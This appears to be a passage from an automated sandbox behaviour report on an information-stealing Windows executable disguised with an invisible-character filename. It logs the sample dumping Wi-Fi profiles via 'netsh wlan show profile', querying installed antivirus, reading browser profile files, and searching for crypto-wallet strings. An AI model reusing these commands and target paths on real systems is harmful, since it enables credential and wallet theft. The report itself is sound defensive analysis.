              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\tree.comQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\tree.comQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\tree.comQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\tree.comQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\tree.comQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\tree.comQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 0_2_00007FF73AE1C460 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF73AE1C460
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 0_2_00007FF73AE36370 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,0_2_00007FF73AE36370
              Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exeCode function: 68_2_00007FF7F7EC48CC GetModuleFileNameW,GetVersionExW,LoadLibraryW,LoadLibraryW,68_2_00007FF7F7EC48CC
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

              Lowering of HIPS / PFW / Operating System Security Settings

              barindex
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
              Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntivirusProduct

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: 00000002.00000002.2329026765.0000028C87B86000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000003.2322690660.0000028C87B63000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2041945157.000001CCD86C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000003.2115215405.0000028C87D18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.2328542790.0000028C87930000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000003.2324666281.0000028C87B77000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2041945157.000001CCD86C6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000003.2326023533.0000028C87B85000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000003.2320597036.0000028C88DA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000003.2323296128.0000028C87B76000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: #U202f#U202f#U2005#U00a0.scr.exe PID: 1788, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: #U202f#U202f#U2005#U00a0.scr.exe PID: 5260, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\_MEI17882\rarreg.key, type: DROPPED
              Source: Yara matchFile source: Process Memory Space: #U202f#U202f#U2005#U00a0.scr.exe PID: 5260, type: MEMORYSTR
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2115215405.0000028C87D18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Electrum
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2115215405.0000028C87D18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Jaxxz
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2115215405.0000028C87D18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Exodusz
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2115215405.0000028C87D18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Ethereum
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2115215405.0000028C87D18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download ServiceJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_storeJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorageJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\favicons.sqliteJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics DatabaseJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM StoreJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\SessionsJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\ls-archive.sqliteJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\000003.logJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storageJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web ApplicationsJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabaseJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\3e445a25-c088-46bb-968a-82532b92e486Jump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation PlatformJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync DataJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App SettingsJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\NetworkJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
